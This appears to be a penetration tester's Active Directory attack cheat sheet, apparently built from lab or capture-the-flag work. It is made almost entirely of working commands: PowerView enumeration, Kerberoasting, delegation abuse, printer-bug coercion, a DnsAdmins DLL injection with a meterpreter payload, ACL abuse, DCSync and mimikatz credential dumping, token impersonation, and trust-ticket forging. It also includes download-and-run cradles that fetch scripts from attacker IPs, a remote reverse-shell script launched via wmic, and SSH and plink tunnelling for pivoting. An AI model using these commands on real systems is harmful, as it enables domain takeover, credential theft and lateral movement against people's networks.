Get-DomainObject -Identity "dc=ADMIN,dc=OFFSHORE,dc=COM" -Domain dev.ADMIN.OFFSHORE.COM       # returns domain object attributes  
Get-DomainController -Domain dev.ADMIN.OFFSHORE.COM                                           # returns domain controller information  
  
Get-DomainUser -Identity svc_testldap -Domain corp.local                                      # returns all user objects, or the user specified (wildcard specifiable)  
Get-DomainUser -AdminCount | Select name, whencreated, pwdlastset, lastlogon                  # Discover Admin Accounts – AdminCount = 1  
Get-DomainUser "S-1-5-21-2291914956-3290296217-2402366952-3609","administrator"               # Return the user with the given SID, as well as Administrator.  
  
New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred  
New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred  
  
Get-DomainComputer | select cn                                                                # get all computer name  
Get-DomainComputer | foreach-object {Resolve-IPAddress $_.cn}                                 # get all computer IP  
Get-DomainComputer -Credential $cred -Domain dev.ADMIN.OFFSHORE.COM                           # Discover computer's in domain dev.ADMIN.OFFSHORE.COM  
Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained -Credential $Cred # Search the specified OU for computeres that allow unconstrained delegation.  
  
Get-DomainSID -Domain dev.ADMIN.OFFSHORE.COM    # S-1-5-21-1416445593-394318334-2645530166  
Get-DomainSID -Domain ADMIN.OFFSHORE.COM        # S-1-5-21-1216317506-3509444512-4230741538  
  
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred          # Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.  
Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword    # This function modifies the ACL/ACE entries for a given Active Directory target object specified by TargetIdentity. Available -Rights are 'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended rights GUID can be set with -RightsGUID.  
Add-DomainObjectAcl -TargetIdentity user2 -PrincipalIdentity user -Rights All  
  
Get-DomainPolicyData -Domain dev.testlab.local                                                # Returns the default domain policy for the dev.testlab.local domain.  
Get-GPODelegation                                                                             # Returns all GPO delegations in current forest.  
Get-DomainGPO -ComputerName windows1.testlab.local                                            # Returns all GPOs applied windows1.testlab.local  
Get-DomainGPOLocalGroup 'Desktops'                                                            # Return any GPO-set groups for the GPO with the given display name.  
Get-DomainGPOUserLocalGroupMapping -Identity dfm -Domain dev.testlab.local                    # Find all computers that dfm user has local administrator rights to in the dev.testlab.local domain.  
Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local                   # Finds users who have local admin rights over WINDOWS3 through GPO correlation.  
  
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat JTR                 # Request kerberos service tickets for all users with non-null SPNs and output in JTR format.  
Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"                           # Request a kerberos service ticket for the specified SPN.  
"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket   # Request kerberos service tickets for all SPNs passed on the pipeline.  
  
Find-InterestingDomainAcl -domain corp.local -SamAccountName svc_testldap                             # enumerate -1000+ modifable ACLs on a specified domain  
Find-InterestingDomainAcl ResolveGUIDs -ADSpath 'OU=Accounts,DC=corp,DC=local'| where {$_.ActiveDirectoryRights -eq 'GenericAll'} # Follow the Delegation  
Get-DecryptedCpassword 'WEEDSA89Dy8df9as0fh907dshaas'                                         # Decrypt password from Group Policy Preferences \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\  
Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local -ProcessName putty.exe -Credential $Cred  
  
## PowerMad - https://github.com/Kevin-Robertson/Powermad  
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.2:8000/Powermad.ps1');  
Get-MachineAccountAttribute -MachineAccount test -Attribute discription  
Get-MachineAccountCreator  
Disable-MachineAccount -MachineAccount test  
Enable-MachineAccount -MachineAccount test  
New-MachineAccount -MachineAccount test  
New-MachineAccount -MachineAccount FS02 -Password $(ConvertTo-SecureString 'P@ssw0rd12345' -AsPlainText -Force) -Verbose -DomainController DC02.dev.ADMIN.OFFSHORE.COM -Domain dev.ADMIN.OFFSHORE.COM  
Remove-MachineAccount -MachineAccount test -Credential $domainadmin  
Set-MachineAccountAttribute -MachineName test -Attribute SamAccountName -Value test  
runas /netonly /user:domain\test powershell  
  
## Unconstrained Delegation  
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description  # Hunting for computer accounts that have kerberos unconstrained delegation enabled  
#### check if TrustedForDelegation field set to $true  
With unconstrained delegation enabled on the computer, when the privileged users connect to the computer, their TGT will be stored in memory, which can be replayed to move laterally and compromise a domain controller.  
sekurlsa::tickets /export  
Service Name (02): cifs ; computerName ; @corp.local    # this is TGS  
Service Name (02): krbtgt ; computerName ; @corp.local    # this is TGT  
Kerberos::ptt     # pass-the-ticket and get Domain Admin rights  
  
1. Attacker discovers and compromises a system with Kerberos unconstrained delegation. Note that if an attacker compromises a Domain Controller in a trusted forest (with a 2-way trust), this can be used to compromise the other forest.  
2. Attacker tests for and discovers a Domain Controller running the Print Spooler (Spooler) service.  
3. Attacker sends the MS-RPRN request RpcRemoteFindFirstPrinterChangeNotification (Kerberos auth) to the DC’s print server.  
4. The DC immediately sends a response to the requester. This response involves the DC creating a Kerberos service ticket (TGS) which contains the Domain Controller’s computer account Kerberos authentication ticket (TGT) since Kerberos is involved and the requesting account is configured with unconstrained delegation.  
5. The attacker now has the Domain Controller computer account Kerberos TGT which can be used to impersonate the DC.  
6. DCSync all account credentials (or other attack involving DA credentials as desired).  
  
#### Domain Compromise via DC Print Server and Kerberos Delegation  
ls \\dc01\pipe\spoolss    # check if a spool service is running on a remote host - https://github.com/vletoux/SpoolerScanner, modify ps script $rprn.CheckIfTheSpoolerIsActive("192.168.0.20")  
.\SpoolSample.exe dc01 ws01 # target and compromised server - https://github.com/leechristensen/SpoolSample  
sekurlsa::tickets    # check if we can retrieve DC01 TGT  
lsadump::dcsync /domain:offense.local /user:spotless  # make our compromised system ws01$ appear like a Domain Controller and extract an NTLM hash for the user  
  
## Constained Delegation  
For eg, user spot has constained delegation permission turned on.  
It can be used to impersonate any user and authenticate to a file system service (CIFS) on a domain controller DC01  
  
## Obtain a TGT for the Constained allowed user  
.\Rubeus.exe asktgt /user:spot /rc4:dc7a49c0c36399ae87f3de623ebab985 /outfile:TGT_spot.kirbi  
## ticket is the base64 ticket we get with `rubeus's tgtdeleg`  
.\Rubeus.exe s4u /ticket:TGT_spot.kirbi /impersonateuser:administrator /domain:offense.local /msdsspn:cifs/dc01.offense.local /dc:dc01.offense.local /ptt  
  
#### exploit constrained delegation using the specified computer account  
[Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null  
$idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')  
$idToImpersonate.Impersonate()  
[System.Security.Principal.WindowsIdentity]::GetCurrent() | select name  
## Obtain a TGT for the Constained allowed user  
.\Rubeus.exe asktgt /user:MS02$ /rc4:dc7a49c0c36399ae87f3de623ebab985 /outfile:TGT_MS02.kirbi  
## Obtain service TGS impersonating Administrator (CIFS)  
.\Rubeus.exe s4u /ticket:TGT_MS02.kirbi /impersonateuser:administrator /domain:client.offshore.com /msdsspn:cifs/dc04.client.offshore.com /dc:dc04.client.offshore.com /ptt  
## Impersonate Administrator on different service (HOST)  
.\Rubeus.exe s4u /ticket:TGT_MS02.kirbi /impersonateuser:administrator /domain:client.offshore.com /msdsspn:cifs/dc04.client.offshore.com /altservice:cifs,HOST,HTTP,RPCSS,LDAP /dc:dc04.client.offshore.com /ptt  
## check the kerberos tickets  
klist  
## Remote commands execution  
dir \\dc04.CLIENT.OFFSHORE.COM\c$    # CIFS  
.\PsExec64.exe \\dc04.CLIENT.OFFSHORE.COM cmd    # HOST,HTTP  
copy rev.ps1 \\dc04.client.offshore.com\c$\windows\temp && wmic /authority:"kerberos:client.offshore.com\DC04" /node:172.16.4.5 process call create "powershell -f c:\windows\temp\rev.ps1"   # CIFS,HOST,PRCSS  
lsadump::dcsync /domain:client.offshore.com /user:administrator     # LDAP  
  
## Kerberos Resource-based Constrained Delegation  
IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.126:8080/Powermad.ps1");  
New-MachineAccount -MachineAccount FS02 -Password $(ConvertTo-SecureString 'P@ssw0rd12345' -AsPlainText -Force) -Verbose -DomainController DC02.dev.ADMIN.OFFSHORE.COM -Domain dev.ADMIN.OFFSHORE.COM  
Get-DomainComputer FS02 -Domain dev.ADMIN.OFFSHORE.COM  
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1416445593-394318334-2645530166-7101)"  
$SDBytes = New-Object byte[] ($SD.BinaryLength)  
$SD.GetBinaryForm($SDBytes, 0)  
$Cred = New-Object System.Management.Automation.PSCredential('dev.ADMIN.OFFSHORE.COM\joe', (new-object System.Security.SecureString))  
Get-DomainComputer DC02 -Domain dev.ADMIN.OFFSHORE.COM | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose -Domain dev.ADMIN.OFFSHORE.COM -Credential $Cred  
Get-DomainComputer DC02 -Domain dev.ADMIN.OFFSHORE.COM -Properties 'msds-allowedtoactonbehalfofotheridentity'  
Rubeus.exe hash /password:P@ssw0rd12345 /user:FS02 /domain:dev.ADMIN.OFFSHORE.COM  
rubeus.exe s4u /user:FS02$ /domain:dev.ADMIN.OFFSHORE.COM /dc:dc02.dev.ADMIN.OFFSHORE.COM /rc4:25CB75FB3F857DE4BB08FEDDCA639D2D /impersonateuser:Administrator /msdsspn:cifs/DC02.dev.ADMIN.OFFSHORE.COM /ptt  
dir \\dc02.dev.ADMIN.OFFSHORE.COM\c$  
klist purge  
rubeus.exe s4u /user:FS02$ /domain:dev.ADMIN.OFFSHORE.COM /rc4:25CB75FB3F857DE4BB08FEDDCA639D2D /impersonateuser:Administrator /msdsspn:cifs/DC02.dev.ADMIN.OFFSHORE.COM /altservice:http,host /dc:DC02.dev.ADMIN.OFFSHORE.COM /ptt  
PsExec64.exe \\dc02.dev.ADMIN.OFFSHORE.COM cmd  
  
## From DnsAdmins to SYSTEM to Domain Compromise - The attack relies on a DLL injection into the dns service running as SYSTEM on the DNS server which most of the time is on a Domain Contoller.  
net user spotless /domain    # For the attack to work, we need to have compromised a user that belongs to a DnsAdmins group  
set payload windows\x64\meterpreter_reverse_tcp    # Building the DLL  
dnscmd dc01 /config /serverlevelplugindll \\10.0.0.2\tools\dns-priv\dnsprivesc.dll    # Abuse DNS with dnscmd  
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll    # check if our request was successful and the registry value ServerLevelPluginDll points to our malicious DLL  
sc.exe \\dc01 stop dns  
sc.exe \\dc01 start dns    # DNS service is probably crashed, so be warned  
#cleanup  
reg query \\10.0.0.6\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters  
reg delete \\10.0.0.6\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll  
sc.exe \\10.0.0.6 stop dns  
sc.exe \\10.0.0.6 start dns  
  
## misc  
Invoke-ShareFinder -ExcludeStandard -Domain corp.local  
Find-LocalAdminAccess -Domain corp.local  
Find-ManagedSecurityGroups | Export-PowerViewCSV -NoTypeInformation group-managers.csv  
  
## auto exploitation  
$pw = ConvertTo-SecureString "P@ssW0rD!" -AsPlainText -Force  
$cred = New-Object System.Management.Automation.PsCredential("administrator", $pw)  
Get-ExploitableSystem -DomainController 172.16.1.5 -Credential $cred | Format-Table -AutoSize # finds systems likely vulnerable to common exploits  
  
## Invoke-ACLpwn - automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured.  
https://github.com/fox-it/Invoke-ACLPwn  
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'  
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -NoDCSync -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'  
  
## Abusing Active Directory ACLs/ACEs  

## Readassword on User
user/group has ReadGMSAPassword privilege to Group Managed Service Accounts can retrive the password of the group of Group Managed Service Accounts.
$gmsa = Get-ADServiceAccount -Identity web_svc -Properties 'msMD-ManagedPassword'
$mp = $gmsa.'msMD-ManagedPassword'
$secpwd = (convertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential "username",$secpwd
Invoke-Command -ComputerName 127.0.0.1 -Cred $cred -ScriptBlock {whoami}
  
## GenericAll on User  
net user victim new_password /domain  
### with active directory module  
Set-ADAccountPassword -Identity victim -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "$newPass" -Force)  
### with Powersploit  
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force  
Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword  
  
## GenericAll on Group  
net group "domain admins" compromised_user /add /domain  
### with active directory module  
Add-ADGroupMember -Identity "domain admins" -Members spotless  
### with Powersploit  
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"  
  
## GenericAll / GenericWrite / Write on Computer  
Prerequisites:  
1. Check if a domain member can add up to 10 computers to the domain, look for property ms-ds-machineaccountquota  
Get-DomainObject -Identity "dc=DEV,dc=ADMIN,dc=OFFSHORE,dc=COM" -Domain dev.ADMIN.OFFSHORE.COM  
2. the DC need to be running at least Windows 2012  
Get-DomainController -Domain dev.ADMIN.OFFSHORE.COM  
3. check target computer object must not have the attribute msds-allowedtoactonbehalfofotheridentity set  
Get-DomainComputer DC02.dev.ADMIN.OFFSHORE.COM -Domain dev.ADMIN.OFFSHORE.COM | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity  
  
execution refer to Kerberos Resource-based Constrained Delegation: Computer Object Take Over  
  
## WriteProperty on Group  
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local";  
  
## Self (Self-Membership) on Group  
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local";  
  
## WriteProperty (Self-Membership)  
net group "domain admins" spotless /add /domain  
  
## ForceChangePassword  
Set-DomainUserPassword -Identity salvador -AccountPassword $UserPassword -Credential $Cred  
Set-DomainUserPassword -Identity delegate -Verbose    # use it when you have a UI  
  
## WriteOwner on Group  
Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose  
  
## GenericWrite on User  
Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"  
  
## WriteDACL + WriteOwner  
Add-DomainObjectAcl -TargetIdentity "CN=MailAdmins,OU=TGroups,DC=tricky,DC=com" -PrincipalIdentity SQLSVC -Rights All -Verbose  
Add-DomainGroupMember -Identity MAILADMINS -Members SQLSVC  
  
## hasSession - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Exfiltration/Invoke-TokenManipulation.ps1  
Get-NetLoggedon -ComputerName sqlserver -ComputerDomain 'dev.ADMIN.OFFSHORE.COM' -Credential $Cred  
Get-NetSession -ComputerName sqlserver -ComputerDomain 'dev.ADMIN.OFFSHORE.COM' -Credential $Cred  
Get-RegLoggedOn -ComputerName sqlserver -ComputerDomain 'dev.ADMIN.OFFSHORE.COM' -Credential $Cred  
Get-NetRDPSession -ComputerName sqlserver -ComputerDomain 'dev.ADMIN.OFFSHORE.COM' -Credential $Cred  
Find-DomainProcess -ComputerName 'DC02' -ComputerDomain 'dev.ADMIN.OFFSHORE.COM' -UserIdentity 'Administrator' -UserDomain 'ADMIN.OFFSHORE.COM'  
Find-DomainUserEvent -ComputerName 'DC02' -ComputerDomain 'dev.ADMIN.OFFSHORE.COM' -UserIdentity 'Administrator' -UserDomain 'ADMIN.OFFSHORE.COM'  
  
## mimikatz  
mimikatz lsadump::sam, lsadump::cache, lsadump::secrets, lsadump::lsa  
mimikatz sekurlsa::logonpasswords  
  
meterpreter > load incognito                                                                                           
Loading extension incognito...Success.                                                                                 
meterpreter > list_tokens -u                                                                                           
                                                                                                                       
Delegation Tokens Available                                                                                            
========================================                                                                               
DEV\imaginarybit                                                                                                       
NT AUTHORITY\LOCAL SERVICE                                                                                             
NT AUTHORITY\NETWORK SERVICE                                                                                           
NT AUTHORITY\SYSTEM                                                                                                    
Window Manager\DWM-1                                                                                                   
                                                                                                                       
Impersonation Tokens Available                                                                                         
========================================                                                                               
ADMIN\DC03$                                                                                                            
DEV\Administrator                                           
NT AUTHORITY\ANONYMOUS LOGON                                
         
meterpreter > impersonate_token "ADMIN\DC03$"                                                                          
[-] No delegation token available                           
[+] Successfully impersonated user ADMIN\DC03$  
  
whoami  
admin\dc03$  
  
## Adds an ACL for a specific active directory object. Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.  
$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid  
Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}  
...  
Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose  
  
$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid  
Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}  
[no results returned]  
$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force  
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)  
Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose  
Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }  
  
## Impersonate Another Domain User  
$cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force);  
find-domainshare -computername fs01.burmat.local -Credential $cred -computerdomain burmat.local -CheckShareAccess  
Invoke-UserImpersonation -Credential $cred  
dir \\fs01.burmat.local\Private  
  
## Set-DomainUserPassword - If you own the owner of another AD user object (WriteOwner, WriteDACL, GenericWrite, Owner, etc), you can reset the password with ease  
$SecPassword = ConvertTo-SecureString 'I l0ve going Fishing!' -AsPlainText -Force  
$Cred = New-Object System.Management.Automation.PSCredential('corp.local\pgibbons', $SecPassword)  
$UserPassword = ConvertTo-SecureString 'Password123!#$' -AsPlainText -Force  
Set-DomainUserPassword -Identity salvador -AccountPassword $UserPassword -Credential $Cred  
  
## Set-DomainObjectOwner  
$SecPassword = ConvertTo-SecureString 'I l0ve going Fishing!' -AsPlainText -Force  
$Cred = New-Object System.Management.Automation.PSCredential('corp.local\pgibbons', $SecPassword)  
Set-DomainObjectOwner -Identity salvador -OwnerIdentity pgibbons -Credential $Cred  
  
## How DCSync works:  
1. Discovers Domain Controller in the specified domain name.  
2. Requests the Domain Controller replicate the user credentials via GetNCChanges (leveraging Directory Replication Service (DRS) Remote Protocol)  
  
## a regular domain user account to run DCSync - three rights need to be delegated at the domain level  
1. Replicating Directory Changes (The “DS-Replication-Get-Changes” extended right, CN: DS-Replication-Get-Changes, GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)  
2. Replicating Directory Changes All (The “Replicating Directory Changes All” extended right, CN: DS-Replication-Get-Changes-All, GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)  
3. Replicating Directory Changes In Filtered Set (The “Replicating Directory Changes In Filtered Set” extended right (this one isn’t always needed but we can add it just in case, CN: DS-Replication-Get-Changes-In-Filtered-Set, GUID: 89e95b76-444d-4c62-991a-0facbeda640c)  
  
## Add/Exploit DCSync Rights - If you have WriteDACL to a domain admins/group. Give DCSync rights to an unprivileged domain user account  
Add-DomainObjectAcl -TargetIdentity "DC=burmatco,DC=local" -PrincipalIdentity useracct1 -Rights DCSync  
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' -PrincipalIdentity 'Legacy Web Servers' -Rights DCSYNC -Verbose  
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity cyber_adm -Rights All -Verbose  
lsadump::dcsync /domain:corp.local /user:iamtheadministrator  
meterpreter > dcsync_ntlm BURMATCO\\useracct1    # dump user's NTLM hashes from the domain  
or  
lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator  
or  
lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt    # using krbtgt to create golden ticket  
  
## Domain Trust Attack  
1. Enumerate all trust your current domain has and map of all the domains you can reach from your current context through the linking of trust referrals.  
2. Enumerate any users/groups/computers (security principals) in one domain that either (1) have access to resources in another domain or (2) are in groups or have users from another domain.  
3. If a domain trusts you, i.e. if the trust is bidirectional or if one-way and inbound, then you can query any Active Directory information from the trusting domain.  
4. All parent->child (intra-forest domain trusts) retain an implicit two way transitive trust with each other  
5. “Enterprise Admins” group is automatically added to child domains' Administrators domain local group in each domain in the forest.  
  
## There are three main ways that security principals (users/groups) from one domain can have access into resources in another foreign/trusting domain  
Case 1: Local Group Membership:       Get-NetLocalGroupMember <server>  
Case 2: Foreign Group Membership:     Get-DomainObject -Domain sub.dev.testlab.local -LDAPFilter '(objectclass=ForeignSecurityPrincipal)' | select -Last 2  
Case 3: Foreign ACL Principals:       Get-DomainObjectACL -Domain <domain.fqdn>  
  
Get-DomainTrust                     -   returns all domain trusts for the current domain or a specified domain  
Get-ForestTrust                     -   returns all forest trusts for the current forest or a specified forest  
Get-DomainForeignUser               -   enumerates users who are in groups outside of the user's domain  
Get-DomainForeignGroupMember        -   enumerates groups with users outside of the group's domain and returns each foreign member  
Get-DomainTrustMapping              -   this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds  
  
Get-DomainTrust -SearchBase “gc://$($ENV:USERDNSDOMAIN)”   # Return all domain trusts in the entire forest  
Get-DomainTrust -NET -Domain "prod.testlab.local"  
Get-DomainTrust -API -Domain "prod.testlab.local"  
Get-DomainTrust -Domain "prod.testlab.local" -Server "PRIMARY.testlab.local" -Credential $Cred  
  
Get-ForestTrust -Forest "external.local"  
Get-ForestTrust -Forest "external.local" -Credential $Cred  
  
Get-DomainForeignUser                                    # Return all users in the current domain who are in groups of foreign domain.  
Get-DomainForeignUser -Domain dev.testlab.local          # Return all users in the dev.testlab.local domain who are in groups of foreign domain.  
"S-1-5-21-1216317506-3509444512-4230741538-1108" | ConvertFrom-SID # Return username  
Get-DomainForeignGroupMember                             # Return all group members in the current domain where the group and member differ.  
Get-DomainForeignGroupMember -Domain dev.testlab.local   # This enumerates groups in the target domain that contain users/groups who are not in the target domain.  
  
Get-DomainTrustMapping | Export-CSV -NoTypeInformation trusts.csv  
Get-DomainTrustMapping -API | Export-CSV -NoTypeInformation trusts.csv  
Get-DomainTrustMapping -NET | Export-CSV -NoTypeInformation trusts.csv  
  
## Trustpocalypse  
If the next domain hop is in the same forest as the domain we’re pivoting from/through, AND we’re able to compromise the krbtgt hash of the child domain  
  
## The path of security principals (users/groups) from one domain can have access into resources in another foreign/trusting domain  
1. They can be added to local groups on individual machines, i.e. the local “Administrators” group on a server.  
Get-NetLocalGroupMember <server>  
  
2. They can be added to groups in the foreign domain. There are some caveats depending on trust type and group scope, described shortly.  
  
They can be added as principals in an access control list, most interesting for us as principals in ACEs in a DACL. For more background on ACLs/DACLs/ACEs, check out the “An ACE Up The Sleeve” whitepaper.  
  
## Forging External Trust Tickets - https://adsecurity.org/?p=1588  
Step 1: Dumping trust passwords (trust keys)  
Step 2: Create a forged trust ticket (inter-realm TGT) using Mimikatz  
Step 3: Use the Trust Ticket file created in Step 2 to get a TGS for the targeted service in the destination domain. Save the TGS to a file.  
Step 4: Inject the TGS file created in Step 3 and then access the targeted service with the spoofed rights.  
  
## Forging Internal AD Forest Trust Tickets - https://adsecurity.org/?p=1588  
Step 1: Dumping trust passwords (trust keys)  
Step 2: Create a forged trust ticket (inter-realm TGT) using Mimikatz  
Step 3: Use the Trust Ticket file created in Step 2 to get a TGS for the targeted service in the destination domain. Save the TGS to a file.  
Step 4: Inject the TGS file created in Step 3 and then access the targeted service with the spoofed rights.  
  
## Finding Privileged Accounts without Using Privileges  
## Build LDAP Filter to look for users with SPN values registered for current domain - powershell - requires a domain-joined computer  
$ldapFilter = "(&(objectclass=user)(objectcategory=user)(servicePrincipalName=*))"  
$domain = New-Object System.DirectoryServices.DirectoryEntry  
$search = New-Object System.DirectoryServices.DirectorySearcher  
$search.SearchRoot = $domain  
$search.PageSize = 1000  
$search.Filter = $ldapFilter  
$search.SearchScope = "Subtree"  
#Execute Search  
$results = $search.FindAll()  
#Display SPN values from the returned objects  
foreach ($result in $results)  
{  
    $userEntry = $result.GetDirectoryEntry()  
    Write-Host "User Name = " $userEntry.name  
    foreach ($SPN in $userEntry.servicePrincipalName)  
    {  
        Write-Host "SPN = " $SPN         
    }  
    Write-Host ""      
}  
  
## Service Accounts Using Generic Object Attributes  
## Build LDAP Filter to look for users with service account naming conventions svc  
$ldapFilter = "(&(objectclass=Person)(cn=*svc*))"    #$ldapFilter = "(&(objectclass=organizationalUnit)(|(name="Service")(name="svc")))"  
$domain = New-Object System.DirectoryServices.DirectoryEntry  
$search = New-Object System.DirectoryServices.DirectorySearcher  
$search.SearchRoot = $domain    # $search.SearchRoot = "LDAP://OU=Service Accounts,OU=JEFFLAB,DC=JEFFLAB,DC=local"  
$search.PageSize = 1000  
$search.Filter = $ldapFilter  
$search.SearchScope = "Subtree"  
#Adds list of properties to search for  
$objProperties = "name"  
Foreach ($i in $objProperties){$search.PropertiesToLoad.Add($i)}  
#Execute Search  
$results = $search.FindAll()  
#Display values from the returned objects  
foreach ($result in $results)  
{  
    $userEntry = $result.GetDirectoryEntry()  
    Write-Host "User Name = " $userEntry.name  
    Write-Host ""      
}  
## Service Accounts Discovery via User Account Control "password never expires"  
$ldapFilter = "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=65536))"  
  
# Port Redirection and Tunneling  
  
## proxy server - port forwarding  
```
vim /etc/rinetd.conf  
add bindaddress(this machine) bindport(this machine) connectaddress(target) connectport(target)  
service rinetd restart  
  
plink -l root -pw password 208.99.127.88 -R 3390:127.0.0.1:3389 #victim machine  
rdesktop 127.0.0.1:3390 #attacker machine  
xfreerdp -sec-nla /u:'hacker' /p:'P@ssw0rd1!' /v:172.16.1.101  
xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d:COMPLYEDGE.COM /u:pete /p:Passw0rd /v:172.16.126.168  
```
## Local Port Forwarding
forward a port from the client machine to the server/target machine - (A) -> B -> B/C  
```
ssh -L <local port to listen>:<remote host>:<remote port> -p <gateway port> <user>@<gateway IP>   
ssh root@proxyserver -p 53 -L 9000:target:80  #forward localhost:9000 to target:80 through proxyserver:53  
on serverA: ssh -N -L 127.0.0.1:9000:127.0.0.1:80 root@serverB      # forward serverA localhost:9000 to serverB localhost:80 through serverA&B ssh tunnel, 127.0.0.1:9000 is open on serverA  
on serverA: ssh -N -L 9000:127.0.0.1:80 root@serverB                # forward serverA:9000 to serverB localhost:80 through serverA&B ssh tunnel, 0.0.0.0:9000 is open on serverA  
on serverA: ssh -N -L 127.0.0.1:9000:serverC:80 root@serverB        # forward serverA localhost:9000 to serverC:80 through serverA&B ssh tunnel, 127.0.0.1:9000 is open on serverA  
on serverA: ssh -N -L 9000:serverC:80 root@serverB                  # forward serverA:9000 to serverC:80 through serverA&B ssh tunnel, 0.0.0.0:9000 is open on serverA  
```
## Remote Port Forwarding
forward a port from the server machine to the client/target machine - E/A <- (A) <- B  
```
ssh -R <remote port to bind>:<local host>:<local port> -p <gateway port> <user>@<gateway IP>   
ssh root@proxyserver -p 53 -R 3390:localhost:3389  #forward my local port 3389 to target at port 3390 through port 53 on proxy server  
On serverA: ssh -N -R 127.0.0.1:1234:127.0.0.1:3389 root@serverB    # forward serverB localhost:1234 to serverA localhost:3389 through serverA&B ssh tunnel, 127.0.0.1:1234 is open on serverB  
On serverA: ssh -N -R 1234:127.0.0.1:3389 root@serverB              # forward serverB:1234 to serverA localhost:3389 through serverA&B ssh tunnel, 0.0.0.0:1234 is open on serverB  
On serverA: ssh -N -R 127.0.0.1:1234:serverE:3389 root@serverB      # forward serverB localhost:1234 to serverE:3389 through serverA&B ssh tunnel, 127.0.0.1:1234 is open on serverB  
On serverA: ssh -N -R 1234:serverE:3389 root@serverB                # forward serverB localhost:1234 to serverE:3389 through serverA&B ssh tunnel, 0.0.0.0:1234 is open on serverB  
```
## Dynamic Port Forwarding  
```
ssh -D <local proxy port> -p <remote port> <target>   
ssh -D 8080 -p 2222 root@proxyserver  
ssh -fNT -D 19050 -i id_rsa root@10.10.110.123  
```
## Proxychains  
on victim:   
`ssh -f -N -R 2222:127.0.0.1:22 root@208.68.234.100`  
on attacker:  
`ssh -f -N -D 127.0.0.1:8080 -p 2222 hax0r@127.0.0.1`  
on attacker:  
`proxychains nmap --top-ports=20 -sT -Pn 172.16.40.0/24`  
`sshuttle --dns -vr root@10.10.110.123 172.16.1.0/24 --ssh-cmd 'ssh -i ./id_rsa'`  

## Invoke-SocksProxy
Creates a local or "reverse" Socks proxy using powershell - https://github.com/p3nt4/Invoke-SocksProxy  
On the remote host:   
```
## Generate a private key and self signed cert  
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout private.key -out cert.pem  
